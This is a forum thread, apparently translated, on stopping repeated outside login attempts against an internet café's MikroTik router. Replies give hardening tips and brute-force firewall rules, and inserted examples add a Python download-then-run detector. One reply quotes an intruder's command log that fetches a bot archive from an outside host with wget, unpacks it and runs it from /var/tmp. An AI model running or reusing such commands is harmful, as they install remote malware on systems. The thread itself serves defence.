Thread: Request for analysis

  1. #1
    goenin

    Request for analysis

    Dear MT masters, I need help. Suspicious entries have been showing up in my MT log for a long time, and the effect is that the internet café has become slow. Please help with advice. Someone is trying to log in from outside; strangely, they try almost every day, and at random times.

    Sorry, I forgot the screenshot, masters.

    Last edited by goenin; 22-10-2012 at 22:35.

  2. #2
    arxe
    Originally Posted by goenin
    Dear MT masters, I need help. Suspicious entries have been showing up in my MT log for a long time, and the effect is that the internet café has become slow. Please help with advice. Someone is trying to log in from outside; strangely, they try almost every day, and at random times.
    Please attach the capture, bro.

  3. #3
    Anto.PJ
    How can it be analyzed if there's no data??

    Use

  4. #4
    nuxer
    Just change the MikroTik's default SSH, Telnet and FTP ports to other ports in the ip service section.

  5. #5
    tanpa_kabel
    If they aren't being used, just turn those services off..

    Check under ip >> services

  6. #6
    andrian
    What does the log say, bro? Be careful, bro, lots of people mess around for fun, stay alert.. stay aleeert.. You need to set up a firewall right away, bro, and make sure the proxy can't be accessed from outside.

  7. #7
    jakichan83
    Is it always the same IP, bro? If it is, just block that IP.

  8. #8
    nfear
    Just disable SSH, bro.

  9. #9
    Anto.PJ
    Originally Posted by nuxer
    Just change the MikroTik's default SSH, Telnet and FTP ports to other ports in the ip service section.
    Agree with this one.. just change 22 to 222 and 21 to wirosableng, or whatever you like.

    Just sharing an experience..
    Recently I came across a case on an internet café's Ubuntu proxy: port 22 was open by default and NATed to the proxy..
    The problem was that the root user was the default.. and the password was weak, just @dm1n..

    I checked the command log, wow.. a bot had been installed on the proxy.. by an unknown person who had logged in as root (whois: from Romania)..

    Code:
    ls -all
    cd /var/tmp
    uname -a
    ps -aux
    kill -9 747
    kill -9 748
    wget http://sinner.3x.ro/NNN/Arhive/KissMe-Mech.tgz << this is bot script, I think..
    tar zxvf KissMe-Mech.tgz
    rm -rf KissMe-Mech.tgz
    cd KissMe-Mech/
    chmod +x *
    ./run
    ./autorun
    Once it's installed, there will be IRC connections originating from the proxy (see conn-track).

    Check the logs regularly; if you find commands that you don't recall ever entering, be on guard!!.. Maybe next time it won't just be a bot that gets installed.. but "syahrini"

    or a bandwidth-eating script..
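
Added example (not part of the original post): a Python check for the pattern visible in the command log of post #9, where something is downloaded into a world-writable directory and then run from there. The watch list of directories, the function names and the sample history with its placeholder URL are constructed for illustration; shell history carries no working directory, so `cd` lines are tracked as a heuristic.

```python
import posixpath

TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")   # assumed watch list
FETCHERS = {"wget", "curl", "fetch"}           # download tools to watch for

def temp_root(path):
    """Return the watched temp dir that contains path, or None."""
    for d in TEMP_DIRS:
        if path == d or path.startswith(d + "/"):
            return d
    return None

def suspicious_runs(history, start_dir="/root"):
    """Return (line_no, command, cwd) for each relative-path execution that
    happens under a temp dir after a download was made under that dir."""
    cwd, fetched_in, findings = start_dir, set(), []
    for no, line in enumerate(history, 1):
        parts = line.split()
        if not parts:
            continue
        cmd, root = parts[0], temp_root(cwd)
        if cmd == "cd" and len(parts) > 1:
            # Follow directory changes so later lines are judged in context.
            cwd = posixpath.normpath(posixpath.join(cwd, parts[1]))
        elif cmd in FETCHERS and root:
            fetched_in.add(root)
        elif cmd.startswith("./") and root and root in fetched_in:
            findings.append((no, line, cwd))
    return findings

# Constructed sample shaped like the log in the post (placeholder URL).
SAMPLE = [
    "ls -all",
    "cd /var/tmp",
    "uname -a",
    "wget http://example.invalid/pkg.tgz",
    "tar zxvf pkg.tgz",
    "cd pkg/",
    "chmod +x *",
    "./run",
    "./autorun",
]

if __name__ == "__main__":
    for no, line, cwd in suspicious_runs(SAMPLE):
        print(f"line {no}: '{line}' executed in {cwd} after a download")
```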

  10. #10
    alehaddad
    Originally Posted by nuxer
    Just change the MikroTik's default SSH, Telnet and FTP ports to other ports in the ip service section.
    What this guy said is right..

    And I'll add a small script to protect your MikroTik..

    /ip firewall filter
    add chain=input protocol=tcp dst-port=21 src-address-list=ftp_blacklist action=drop \
    comment="drop ftp brute forcers"

    add chain=output action=accept protocol=tcp content="530 Login incorrect" dst-limit=1/1m,9,dst-address/1m

    add chain=output action=add-dst-to-address-list protocol=tcp content="530 Login incorrect" \
    address-list=ftp_blacklist address-list-timeout=3h

    /ip firewall filter
    add chain=input protocol=tcp dst-port=22 src-address-list=ssh_blacklist action=drop \
    comment="drop ssh brute forcers" disabled=no

    add chain=input protocol=tcp dst-port=22 connection-state=new \
    src-address-list=ssh_stage3 action=add-src-to-address-list address-list=ssh_blacklist \
    address-list-timeout=10d comment="" disabled=no

    add chain=input protocol=tcp dst-port=22 connection-state=new \
    src-address-list=ssh_stage2 action=add-src-to-address-list address-list=ssh_stage3 \
    address-list-timeout=1m comment="" disabled=no

    add chain=input protocol=tcp dst-port=22 connection-state=new src-address-list=ssh_stage1 \
    action=add-src-to-address-list address-list=ssh_stage2 address-list-timeout=1m comment="" disabled=no

    add chain=input protocol=tcp dst-port=22 connection-state=new action=add-src-to-address-list \
    address-list=ssh_stage1 address-list-timeout=1m comment="" disabled=no

    add chain=forward protocol=tcp dst-port=22 src-address-list=ssh_blacklist action=drop \
    comment="drop ssh brute downstream" disabled=no

    NB: Source: Uncle WIKI

    Please correct it if anything is wrong...
    Last edited by alehaddad; 30-01-2013 at 15:24.
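
Added example (not from the post or the MikroTik wiki): a Python model of how the five SSH input rules in post #10 move one source address through ssh_stage1, ssh_stage2 and ssh_stage3 into ssh_blacklist. The class and function names and the timestamps are constructed; restarting an entry's timeout when it is re-added is an assumption that the results here do not depend on.

```python
STAGE_TTL = 60                # address-list-timeout=1m on the stage lists
BLACKLIST_TTL = 10 * 86400    # address-list-timeout=10d on ssh_blacklist

class SshLadder:
    """Evaluates the chain=input, dst-port=22 rules in their listed order."""

    def __init__(self):
        # Each address list maps source IP -> expiry time in seconds.
        self.lists = {n: {} for n in
                      ("ssh_stage1", "ssh_stage2", "ssh_stage3", "ssh_blacklist")}

    def _member(self, name, src, now):
        return self.lists[name].get(src, -1) > now

    def _add(self, name, src, now, ttl):
        # Assumption: re-adding an existing entry restarts its timeout.
        self.lists[name][src] = now + ttl

    def new_connection(self, src, now):
        """Verdict of these rules for one connection-state=new packet."""
        # Rule 1: blacklisted sources are dropped before anything else.
        if self._member("ssh_blacklist", src, now):
            return "drop"
        # Rules 2-5 do not stop processing, and run from stage3 down to
        # stage1, so one connection climbs exactly one stage.
        if self._member("ssh_stage3", src, now):
            self._add("ssh_blacklist", src, now, BLACKLIST_TTL)
        if self._member("ssh_stage2", src, now):
            self._add("ssh_stage3", src, now, STAGE_TTL)
        if self._member("ssh_stage1", src, now):
            self._add("ssh_stage2", src, now, STAGE_TTL)
        self._add("ssh_stage1", src, now, STAGE_TTL)
        return "pass"   # not dropped here; later rules still apply

def replay(times, src="192.0.2.10"):
    """Feed new-connection timestamps (seconds) for one source, in order."""
    fw = SshLadder()
    return [fw.new_connection(src, t) for t in times]

if __name__ == "__main__":
    print(replay([0, 10, 20, 30, 40]))       # rapid attempts
    print(replay([0, 120, 240, 360, 480]))   # one attempt every two minutes
```

The rules count new connections to port 22, not failed logins, so the fourth connection inside the one-minute windows is still let through and the source is dropped from the fifth onward, which also applies to an administrator who reconnects quickly. The rules match dst-port=22 only, so they need the new port number if the SSH port is changed as suggested earlier in the thread.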

  11. #11
    Amplak
    Permission to follow along while the masters are explaining things.
